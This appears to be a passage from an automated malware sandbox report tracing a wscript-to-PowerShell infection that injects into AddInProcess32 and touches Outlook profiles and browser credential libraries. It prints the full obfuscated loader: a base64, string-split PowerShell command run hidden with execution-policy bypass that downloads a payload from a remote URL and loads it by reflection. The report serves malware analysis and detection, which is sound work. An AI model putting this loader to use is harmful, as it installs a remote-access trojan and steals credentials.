              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: devenum.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msdmo.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Binary string: vcruntime140.i386.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2645142075.0000000073BD1000.00000020.00000001.01000000.00000007.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.5.dr
              Source: Binary string: vcruntime140.i386.pdbGCTL source: AddInProcess32.exe, 00000005.00000002.2645142075.0000000073BD1000.00000020.00000001.01000000.00000007.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.5.dr
              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2642667288.000000007024F000.00000002.00000001.01000000.0000000B.sdmp, freebl3.dll.5.dr
              Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000005.00000002.2628713134.0000000003613000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdbGCTL source: AddInProcess32.exe, 00000005.00000002.2644081524.00000000702D1000.00000020.00000001.01000000.00000006.sdmp, AddInProcess32.exe, 00000005.00000002.2627316202.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.5.dr
              Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: powershell.exe, 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: powershell.exe, 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr
              Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: AddInProcess32.exe, 00000005.00000002.2630145863.0000000004573000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdb source: AddInProcess32.exe, 00000005.00000002.2644081524.00000000702D1000.00000020.00000001.01000000.00000006.sdmp, AddInProcess32.exe, 00000005.00000002.2627316202.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.5.dr
              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss3.pdb source: AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr
              Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000005.00000002.2628713134.0000000003613000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2643512971.00000000702B9000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr
              Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.1443666553.000001B2BB240000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1415526929.000001B2B3B23000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2643512971.00000000702B9000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr
              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr
              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2642667288.000000007024F000.00000002.00000001.01000000.0000000B.sdmp, freebl3.dll.5.dr
              Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: AddInProcess32.exe, 00000005.00000002.2630145863.0000000004573000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4", "0", "false");
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ